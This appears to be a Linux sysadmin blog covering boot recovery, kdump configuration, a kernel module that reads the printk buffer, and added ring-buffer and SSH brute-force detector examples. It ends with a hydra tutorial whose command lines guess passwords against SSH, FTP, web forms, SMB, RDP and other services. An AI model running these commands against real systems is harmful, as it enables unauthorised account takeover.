kk Blog —— General Basics


date [-d @int|str] [+%s|"+%F %T"]
netstat -ltunp

Linux: changing the runlevel and boot parameters on the fly, a full disk that blocks booting, and a forgotten password

1. Recovering from a misconfigured default runlevel

If you accidentally set the default runlevel to 0 or 6, recover as follows:
1. Boot the system and press any key before the countdown ends to enter the GRUB menu
2. In the GRUB menu press 'e' to go one level down, highlight the second line, and press 'e' again
3. Append 1 (single-user mode) at the end of the line and press Enter to return to the previous level (a single-user boot does not read /etc/inittab)
4. Press 'b' to boot

Other boot parameters can be changed the same way. The simplest emergency boot is:
pass init=/bin/bash or init=/bin/sh to the kernel

2. Disk full, system will not boot

Delete some files, then reboot.
If the files cannot be deleted because the filesystem is read-only, remount your root filesystem read-write:

mount -o remount,rw  /

3. Forgotten password

passwd user

Versions of kexec-tools before 1.102pre-164.el5 have a problem

kexec-tools-1.102pre-154.el5 drops straight into dump.img, so you see a single CPU running and only as much memory as the crashkernel reservation. Once `ext /dev/sd*` is specified explicitly it works normally. The other problem is that when dumping over the network it only ever uses eth0; otherwise it fails.

e2fsck 1.38 (30-Jun-2005)
fsck.ext3: while determining whether /dev/sda2 is mounted.
/: recovering journal
/: clean, 100877/4653056 files, 1236284/4648809 blocks
Mounting root filesystem.
Trying mount -t ext4 /dev/sda2 /sysroot
Trying mount -t ext3 /dev/sda2 /sysroot
Using ext3 on root filesystem
Switching to new root and running init.
INIT: version 2.86 booting
        Welcome to  CentOS release 5.8 (Final)
        Press 'I' to enter interactive startup.
Cannot access the Hardware Clock via any known method.
Use the --debug option to see the details of our search for an access method.
Setting clock  (utc): Tue Aug  5 19:18:49 PDT 2014 [  OK  ]
Starting udev: [  OK  ]

ftp://ftp.redhat.com/pub/redhat/linux/enterprise/5Client/en/os/SRPMS/kexec-tools-1.102pre-154.el5.src.rpm

vim mkdumprd


https://bugzilla.redhat.com/show_bug.cgi?id=788678

Hmm, after a second thought, did you put the block device mounted on /var into your /etc/kdump.conf? Something like:

ext3 /dev/sdbX   #the device mounted on /var
path crash       #relative path inside /var

? Please share your kdump.conf if possible.

Thanks!

The point is to not touch the default kdump.conf, and mkdumprd should just work, like it does in RHEL6.

If I do put the ext3 and path directives into kdump.conf, then of course things work fine, but it shouldn’t be needed for the stock case where you just want to dump to /var/crash on your local filesystem.

Yeah… I saw how RHEL6 handles this, will try to backport it to RHEL5. Thanks!

Created attachment 594144 [details]: Proposed Patch v3

Ok, let’s just remove the UUID converting code.

Yep - it works now!

… almost. I’m pretty sure that the RHEL6 default mkdumprd uses makedumpfile by default so it isn’t just using “cp” to create the vmcore file.

The currently-patched version appears to just use “cp” instead.

Yeah, this is expected, because we don’t have a chance to change the default core_collector to makedumpfile on RHEL5, so “cp” is still the default one. :)

Thanks for testing!

log_buf (ring buffer) (syslog) (printk)

All printk output is stored in log_buf.

How do you read the ring buffer? Here is a nice explanation from IBM developerWorks: dmesg would be your first resort! How does dmesg accomplish its task? By a call to syslog()! How does syslog do its job? Through the system call interface, which in turn calls do_syslog(). do_syslog() does the finishing act like this:


// Imitate do_syslog() from kernel/printk.c: read the last 4 KiB of printk output from inside a module

/* Kernel-module fragment for the 2.6.18-era CentOS 5 kernel this post is about.
 * The four addresses are the kernel's own log_buf / log_buf_len / log_start /
 * log_end symbols copied from this machine's System.map; they differ per build. */
#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/fs.h>
#include <linux/err.h>
#include <asm/uaccess.h>        /* get_fs / set_fs / get_ds */

#define L 4096                  /* read the last 4 KiB of printk output */
static char buf[L];
static const char *file_path = "/tmp/printk_tail.log";  /* where the copy is written */

static int dump_log_tail(void)
{
    char **log_buf;
    int *log_buf_len, *log_start, *log_end;
    int MASK;
    int end, len;
    unsigned i, j, limit, count;
    char c;
    int ret;
    struct file *file;
    mm_segment_t old_fs;

    log_buf     = (char**) 0xffffffff803270e0;
    log_buf_len = (int*)   0xffffffff803270d8;
    log_start   = (int*)   0xffffffff804eabd0;  /* not needed for the tail */
    log_end     = (int*)   0xffffffff804eabe0;
    (void)log_start;

    end = *log_end;             /* one past the newest byte; never wrapped itself */
    len = *log_buf_len;         /* a power of two, so (idx & MASK) wraps the index */
    MASK = len - 1;

    count = L;
    if (count > len) count = len;
    limit = end;

    /* walk backwards from log_end so buf ends with the newest character;
     * embedded NULs become newlines, as do_syslog does */
    for (i = 0; i < count; i++) {
        j = limit - 1 - i;
        c = *(*log_buf + (j & MASK));
        if (c == '\0') c = '\n';
        buf[count - 1 - i] = c;
    }

    /* write it out (0777 leaves the dump world-writable; 0600 is the safer choice) */
    file = filp_open(file_path, O_RDWR|O_CREAT|O_APPEND, 0777);
    if (IS_ERR(file)) {
        printk("Open file %s failed..\n", file_path);
        return 0;
    }
    old_fs = get_fs();
    set_fs(get_ds());           /* let f_op->write accept a kernel buffer */
    ret = file->f_op->write(file, buf, count, &file->f_pos);
    file->f_op->fsync(file, file->f_dentry, 0);
    set_fs(old_fs);
    filp_close(file, NULL);
    return ret;
}
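The loop above is easier to reason about outside the kernel. The following is an added example, not code from the post or from kernel/printk.c: a userspace model of the 2.6-era printk ring buffer (a power-of-two buffer indexed with `idx & MASK`, and a `log_end` counter that is never wrapped itself) together with the same backwards "last N bytes" walk. The buffer size, message text and helper names are constructed for the demonstration. It also handles one edge the module does not: it clamps the request to the number of bytes actually written, which the kernel tracks as `logged_chars`, so a buffer that has not yet wrapped is never read past its start.

```c
/* Added example: userspace model of the 2.6 printk ring buffer and the
 * "read the last N bytes" walk used by do_syslog(). Not kernel code. */
#include <stdio.h>
#include <string.h>

#define LOG_BUF_LEN  16                 /* constructed: tiny, so wrap-around is visible */
#define LOG_BUF_MASK (LOG_BUF_LEN - 1)  /* valid only because LOG_BUF_LEN is a power of two */

struct log_ring {
    char buf[LOG_BUF_LEN];
    unsigned end;                       /* next write position; counts up forever */
};

/* Store bytes the way emit_log_char() did: write at (end & MASK), advance end. */
static void ring_emit(struct log_ring *r, const char *s, size_t n)
{
    for (size_t k = 0; k < n; k++)
        r->buf[r->end++ & LOG_BUF_MASK] = s[k];
}

/* Copy the newest `want` bytes into out (NUL-terminated); returns bytes copied.
 * Walks backwards from end exactly like the module loop, mapping NUL to '\n'.
 * Unlike the module it never reads slots that were never written. */
static unsigned ring_tail(const struct log_ring *r, char *out, unsigned want)
{
    unsigned avail = r->end < LOG_BUF_LEN ? r->end : LOG_BUF_LEN;
    unsigned count = want < avail ? want : avail;
    for (unsigned i = 0; i < count; i++) {
        unsigned j = r->end - 1 - i;
        char c = r->buf[j & LOG_BUF_MASK];
        if (c == '\0') c = '\n';
        out[count - 1 - i] = c;
    }
    out[count] = '\0';
    return count;
}

/* Two constructed messages (20 bytes) into a 16-byte ring: the first four
 * bytes of "boot ok\n" are overwritten. Compare the tail with `expected`. */
static int tail_equals(unsigned want, const char *expected)
{
    struct log_ring r = { {0}, 0 };
    char out[LOG_BUF_LEN + 1];
    ring_emit(&r, "boot ok\n", 8);
    ring_emit(&r, "oops: panic\n", 12);
    ring_tail(&r, out, want);
    return strcmp(out, expected) == 0;
}

/* An embedded NUL (printk record separator) is rendered as a newline. */
static int nul_becomes_newline(void)
{
    struct log_ring r = { {0}, 0 };
    char out[LOG_BUF_LEN + 1];
    ring_emit(&r, "a\0b", 3);
    return ring_tail(&r, out, 8) == 3 && strcmp(out, "a\nb") == 0;
}

int main(void)
{
    struct log_ring r = { {0}, 0 };
    char out[LOG_BUF_LEN + 1];
    ring_emit(&r, "boot ok\n", 8);
    ring_emit(&r, "oops: panic\n", 12);
    ring_tail(&r, out, 10);
    fputs(out, stdout);                 /* prints "ps: panic" and a newline */
    return 0;
}
```

Asking for more than the buffer holds returns at most LOG_BUF_LEN bytes, and the oldest surviving byte is whatever sits at `(end - LOG_BUF_LEN) & MASK`, which is why the module must mask every index rather than copying `buf[0..len)` in order.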

kdump conf

cat /etc/kdump.conf

# Configures where to put the kdump /proc/vmcore files
#
# This file contains a series of commands to perform (in order) when a
# kernel crash has happened and the kdump kernel has been loaded.  Directives in
# this file are only applicable to the kdump initramfs, and have no effect if
# the root filesystem is mounted and the normal init scripts are processed
#
# Currently only one dump target and path may be configured at a time. If dump
# to configured dump target fails, the default action will be preformed.
# Default action may be configured with the "default" directive below.
#
# Basics commands supported are:
# path <path>           - Append path to the filesystem device which you are
#                         dumping to.  Ignored for raw device dumps.
#                         If unset, will default to /var/crash.
#
# core_collector <command> <options>
#                       - This allows you to specify the command to copy the
#                         vmcore.  You could use the dump filtering program
#                         makedumpfile, the default one, to retrieve your core,
#                         which on some arches can drastically reduce core file
#                         size. See /usr/sbin/makedumpfile --help for a list of
#                         options. Note that the -i and -g options are not
#                         needed here, as the initrd will automatically be
#                         populated with a config file appropriate for the
#                         running kernel.
#                         For ssh dump, scp should be used instead of cp.
#
# raw <partition>       - Will write /proc/vmcore into raw <partition>.
#
# nfs <nfs mount>       - Will mount fs and copy /proc/vmcore to
#                         <mnt>/<path>/%HOST-%DATE/, supports DNS.
#
# nfs4 <nfs mount>      - Will use NFSv4 instead of NFSv3
#
# net <nfs mount>       - This is a deprecated option to transfer vmcore over
#                         nfs.  Use "nfs" option instead.
#
# ssh <user@server>     - Will copy /proc/vmcore to
#                         <user@server>:<path>/%HOST-%DATE/ via SSH,
#                         supports DNS. If makedumpfile is the core_collector,
#                         it is piped to an "ssh" shell, otherwise use the
#                         specified core_collector like scp.
#                         NOTE: make sure user has necessary write
#                         permissions on server
#
# net <user@server>     - This is a deprecated option to transfer vmcore over
#                         ssh.  Use "ssh" option instead.
#
# <fs type> <partition> - Will mount -t <fs type> <partition> /mnt and copy
#                         /proc/vmcore to /mnt/<path>/127.0.0.1-%DATE/.
#                         NOTE: <partition> can be a device node, label or uuid.
#
# disk_timeout <seconds>
#                       - Number of seconds to wait for disks to appear prior
#                         to continue to save dump. By default kdump waits
#                         180 seconds for the disks to show up it needs. This
#                         can be useful in some cases if disk never shows up
#                         (Either because disk was removed or because kdump is
#                         waiting on wrong disk).
#
# link_delay <seconds>
#                       - Some network cards take a long time to initialize, and
#                         some spanning tree enabled networks do not transmit
#                         user traffic for long periods after a link state
#                         changes.  This optional parameter defines a wait
#                         period after a link is activated in which the
#                         initramfs will wait before attempting to transmit
#                         user data.
#
# kdump_post <binary | script>
#                       - This directive allows you to run a specified
#                         executable just after the memory dump process
#                         terminates. The exit status from the dump process
#                         is fed to the kdump_post executable, which can be
#                         used to trigger different actions for success or
#                         failure.
#
# kdump_pre <binary | script>
#                       - works just like the kdump_post directive, but instead
#                         of running after the dump process, runs immediately
#                         before.  Exit status of this binary is interpreted
#                         as follows:
#                         0 - continue with dump process as usual
#                         non 0 - reboot/halt the system
#
# extra_bins <binaries | shell scripts>
#                       - This directive allows you to specify additional
#                         binaries or shell scripts you'd like to include in
#                         your kdump initrd. Generally only useful in
#                         conjunction with a kdump_post binary or script that
#                         relies on other binaries or scripts.
#
# extra_modules <module(s)>
#                       - This directive allows you to specify extra kernel
#                         modules that you want to be loaded in the kdump
#                         initrd, typically used to set up access to
#                         non-boot-path dump targets that might otherwise
#                         not be accessible in the kdump environment. Multiple
#                         modules can be listed, separated by a space, and any
#                         dependent modules will automatically be included.
#                         Module name should be specified without ".ko" suffix.
#
# options <module> <option list>
#                       - This directive allows you to specify options to apply
#                         to modules in the initramfs.  This directive overrides
#                         options specified in /etc/modprobe.conf. Module name
#                         should be specified without ".ko" suffix.
#
# blacklist <module|directory>
#                       - Prevents modules from being loaded in the initframfs,
#                         either directly during auto-created insmod calls or as
#                         a dependency of another module load. A specific module
#                         or a directory can be specified. In the latter case,
#                         all modules found below the specified directory will
#                         be excluded. This directive can be specified multiple
#                         times or as a space separated list. Module name should
#                         be specified without ".ko" suffix.
#
# sshkey <path>
#                       - Specifies the path of the ssh identity file you want
#                         to use when doing ssh dump. It must be a private key,
#                         the default value is /root/.ssh/kdump_id_rsa. When
#                         progagating public key, the key is assumed to be
#                         identity_file.pub which by default is
#                         /root/.ssh/kdump_id_rsa.pub.
#
# default <reboot | halt | poweroff | shell | mount_root_run_init>
#                       - Action to preform in case dumping to intended target
#                         fails. If no default action is specified, "reboot"
#                         is assumed default.
#
#                         reboot: If the default action is reboot simply reboot
#                                 the system and loose the core that you are
#                                 trying to retrieve.
#                         halt:   If the default action is halt, then simply
#                                 halt the system after attempting to capture
#                                 a vmcore, regardless of success or failure.
#                         poweroff: The system will be powered down
#                         shell:  If the default action is shell, then drop to
#                                 an hush session inside the initramfs from
#                                 where you can try to record the core manually.
#                                 Exiting this shell reboots the system.
#            mount_root_run_init: Mount root filesystem and run init. Kdump
#                                   initscript will try to save dump to root
#                                   filesystem in /var/crash dir. This will
#                                   likely require a lot more memory to
#                                   be reserved for kdump kernel.
#
# debug_mem_level <0-3>
#                       - Turns on debug/verbose output of kdump scripts
#                         regarding free/used memory at various points of
#                         execution. Higher level means more debugging output.
#                         0 - no output
#                         1 - partial /proc/meminfo
#                         2 - /proc/meminfo
#                         3 - /proc/meminfo + /proc/slabinfo
#
# force_rebuild <0 | 1>
#                       - By default, kdump initrd only will be rebuilt when
#                         necessary. Specify 1 here to force rebuilding kdump
#                         initrd every time when kdump service starts.

Brute-force password cracking tool: the dictionary is what matters

http://www.ha97.com/5186.html

  • PS: this brute-force tool is very capable and supports online password cracking for almost every protocol; whether a password falls depends entirely on how strong the dictionary is. In social-engineering-driven penetration tests it can sometimes produce outsized results.

1. Introduction

hydra is an open-source online brute-force password cracker from the well-known hacker group THC that can attack many kinds of passwords. Website: http://www.thc.org/thc-hydra . It supports AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP, HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-PROXY, HTTPS-FORM-GET, HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MYSQL, NCP, NNTP, Oracle Listener, Oracle SID, Oracle, PC-Anywhere, PCNFS, POP3, POSTGRES, RDP, Rexec, Rlogin, Rsh, SAP/R3, SIP, SMB, SMTP, SMTP Enum, SNMP, SOCKS5, SSH (v1 and v2), Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP, among others.

2. Installation

On Debian and Ubuntu, hydra is in the distribution repositories; install it directly with apt-get:

sudo apt-get install libssl-dev libssh-dev libidn11-dev libpcre3-dev libgtk2.0-dev libmysqlclient-dev libpq-dev libsvn-dev firebird2.1-dev libncp-dev hydra

On Redhat/Fedora, download the source package and build it; install the dependencies first:

yum install openssl-devel pcre-devel ncpfs-devel postgresql-devel libssh-devel subversion-devel

hydra download: http://www.thc.org/releases/hydra-7.3.tar.gz

# tar zxvf hydra-7.0-src.tar.gz
# cd hydra-7.0-src
# ./configure
# make
# make install

hydra also ships a GUI front end.

3. Options

hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e ns]
[-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-f] [-s PORT] [-S] [-vV] server service [OPT]
-R        resume from the progress of the previous run.
-S        use an SSL connection.
-s PORT   use this port instead of the service's default.
-l LOGIN  the login name to test; attacks one specific user.
-L FILE   a file of login names.
-p PASS   lowercase: a single password; rarely used, a password list is the norm.
-P FILE   uppercase: a password list file.
-e ns     optional: n tries an empty password, s tries the given login name as the password.
-C FILE   colon-separated "login:password" pairs, used instead of -L/-P.
-M FILE   a list of targets, one per line.
-o FILE   write results to this file.
-f        when used with -M, stop as soon as the first login/password pair is found.
-t TASKS  number of parallel connections, default 16.
-w TIME   maximum wait time in seconds, default 30.
-v / -V   verbose output.

server is the target IP; service is the service name. Supported services and protocols: telnet ftp pop3[-ntlm] imap[-ntlm] smb smbnt http-{head|get} http-{get|post}-form http-proxy cisco cisco-enable vnc ldap2 ldap3 mssql mysql oracle-listener postgres nntp socks5 rexec rlogin pcnfs snmp rsh cvs svn icq sapr3 ssh smtp-auth[-ntlm] pcanywhere teamspeak sip vmauthd firebird ncp afp, and so on. OPT are service-specific options.

4. Usage examples

A simple demonstration:

On success the result is printed directly; the red-underlined part of the screenshot is the recovered password, and -o can write it to a file as well. With a strong enough dictionary, combined with social engineering, the password does not take long to come out.

1. SSH:
hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns ip ssh
hydra -l 用户名 -p 密码字典 -t 线程 -o save.log -vV ip ssh

2. FTP:
hydra ip ftp -l 用户名 -P 密码字典 -t 线程(默认16) -vV
hydra ip ftp -l 用户名 -P 密码字典 -e ns -vV

3. Web login submitted with GET:
hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns ip http-get /admin/
hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns -f ip http-get /admin/index.php

4. Web login submitted with POST:
hydra -l 用户名 -P 密码字典 -s 80 ip http-post-form "/admin/login.php:username=^USER^&password=^PASS^&submit=login:sorry password"


hydra -t 3 -l admin -P pass.txt -o out.txt -f 10.36.16.18 http-post-form "login.php:id=^USER^&passwd=^PASS^:<title>wrong username or password</title>"

(Option notes: -t runs 3 parallel tasks, -l sets the login name to admin, pass.txt is the password list, -o saves results to out.txt,
-f stops as soon as one password is found, 10.36.16.18 is the target IP,
http-post-form means the login form is submitted with an HTTP POST,
and the text inside <title> is the response string that identifies a failed guess.)

5. HTTPS:
hydra -m /index.php -l muts -P pass.txt 10.36.16.18 https

6. TeamSpeak:
hydra -l 用户名 -P 密码字典 -s 端口号 -vV ip teamspeak

7. Cisco:
hydra -P pass.txt 10.36.16.18 cisco
hydra -m cloud -P pass.txt 10.36.16.18 cisco-enable

8. SMB:
hydra -l administrator -P pass.txt 10.36.16.18 smb

9. POP3:
hydra -l muts -P pass.txt my.pop3.mail pop3

10. RDP:
hydra ip rdp -l administrator -P pass.txt -V

11. HTTP proxy:
hydra -l admin -P pass.txt http-proxy://10.36.16.18

12. IMAP:
hydra -L user.txt -p secret 10.36.16.18 imap PLAIN
hydra -C defaults.txt -6 imap://[fe80::2c:31ff:fe12:ac11]:143/PLAIN
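Seen from the other side, every run like the SSH examples above leaves the same footprint in the target's auth log: a burst of "Failed password" records from one source, arriving as fast as the -t parallel tasks allow. The following is an added example, not part of the original post or of hydra: a small detector in C that walks sshd log lines, counts failures per source address inside a time window, and flags a source once it crosses a threshold. The log lines, the threshold of 5 failures, the 60-second window and the function names are all constructed for the demonstration; real auth.log lines carry a syslog timestamp rather than the epoch seconds used here.

```c
/* Added example, not from the original post: flag a source address once it
 * accumulates THRESHOLD sshd login failures within WINDOW_SECS.
 * All sample lines below are constructed. */
#include <stdio.h>
#include <string.h>

#define THRESHOLD   5       /* failures per source before alerting (constructed policy) */
#define WINDOW_SECS 60      /* burst window in seconds (constructed policy) */
#define MAX_SRC     64

struct src_stat {
    char ip[46];            /* room for an IPv6 literal */
    int  total;             /* all failures seen from this source */
    int  fails;             /* failures inside the current burst window */
    long first_ts;          /* start of the current burst */
    int  alerted;
};

static struct src_stat table[MAX_SRC];
static int ntable;

/* Constructed sshd lines; a raw epoch timestamp stands in for the syslog
 * "Mon DD HH:MM:SS" stamp so the parser stays focused on the logic. */
static const char *sample_log[] = {
    "1700000000 host sshd[211]: Failed password for root from 198.51.100.7 port 50112 ssh2",
    "1700000001 host sshd[212]: Failed password for root from 198.51.100.7 port 50113 ssh2",
    "1700000001 host sshd[213]: Failed password for invalid user admin from 198.51.100.7 port 50114 ssh2",
    "1700000002 host sshd[214]: Failed password for root from 198.51.100.7 port 50115 ssh2",
    "1700000003 host sshd[215]: Failed password for root from 198.51.100.7 port 50116 ssh2",
    "1700000003 host sshd[216]: Failed password for root from 198.51.100.7 port 50117 ssh2",
    "1700000010 host sshd[220]: Failed password for alice from 203.0.113.5 port 40001 ssh2",
    "1700000015 host sshd[221]: Accepted password for alice from 203.0.113.5 port 40002 ssh2",
    "1700000100 host sshd[230]: Failed password for bob from 203.0.113.9 port 40100 ssh2",
    "1700000170 host sshd[231]: Failed password for bob from 203.0.113.9 port 40101 ssh2",
    "1700000240 host sshd[232]: Failed password for bob from 203.0.113.9 port 40102 ssh2",
    "1700000310 host sshd[233]: Failed password for bob from 203.0.113.9 port 40103 ssh2",
    "1700000380 host sshd[234]: Failed password for bob from 203.0.113.9 port 40104 ssh2",
};

static void reset_table(void) { ntable = 0; memset(table, 0, sizeof table); }

static struct src_stat *lookup(const char *ip)
{
    for (int i = 0; i < ntable; i++)
        if (strcmp(table[i].ip, ip) == 0) return &table[i];
    return NULL;
}

static struct src_stat *get_or_add(const char *ip)
{
    struct src_stat *s = lookup(ip);
    if (s) return s;
    if (ntable >= MAX_SRC) return NULL;     /* table full: drop rather than overflow */
    s = &table[ntable++];
    snprintf(s->ip, sizeof s->ip, "%s", ip);
    return s;
}

/* Pull (timestamp, source ip) out of one sshd failure line; 0 if it is not one. */
static int parse_failure(const char *line, long *ts, char *ip, size_t iplen)
{
    if (sscanf(line, "%ld", ts) != 1) return 0;
    if (!strstr(line, "sshd[") || !strstr(line, "Failed password for")) return 0;
    const char *p = strstr(line, " from ");
    if (!p) return 0;
    p += 6;
    size_t n = strcspn(p, " ");
    if (n == 0 || n >= iplen) return 0;
    memcpy(ip, p, n);
    ip[n] = '\0';
    return 1;
}

/* Feed one line; returns 1 if it pushed its source over the threshold. */
static int observe(const char *line)
{
    long ts;
    char ip[46];
    if (!parse_failure(line, &ts, ip, sizeof ip)) return 0;
    struct src_stat *s = get_or_add(ip);
    if (!s) return 0;
    s->total++;
    if (s->fails == 0 || ts - s->first_ts > WINDOW_SECS) {   /* start a new burst */
        s->fails = 0;
        s->first_ts = ts;
    }
    s->fails++;
    if (s->fails >= THRESHOLD && !s->alerted) {
        s->alerted = 1;
        printf("ALERT %s: %d failed logins within %lds\n", s->ip, s->fails, ts - s->first_ts);
        return 1;
    }
    return 0;
}

/* Scan a batch of lines from a fresh table; returns how many sources alerted. */
static int scan(const char **lines, int n)
{
    int alerts = 0;
    reset_table();
    for (int i = 0; i < n; i++) alerts += observe(lines[i]);
    return alerts;
}

static int scan_sample(void)
{
    return scan(sample_log, (int)(sizeof sample_log / sizeof sample_log[0]));
}

int main(void)
{
    printf("%d source(s) alerted\n", scan_sample());
    return 0;
}
```

On the constructed input only 198.51.100.7 is flagged: six failures inside three seconds. The slow guesser at 203.0.113.9 never trips the window-based rule despite five failures, which is exactly the gap a low -t / -w run exploits, so in practice this rule is paired with a per-account counter and with sshd's own MaxAuthTries and a rate limiter such as fail2ban.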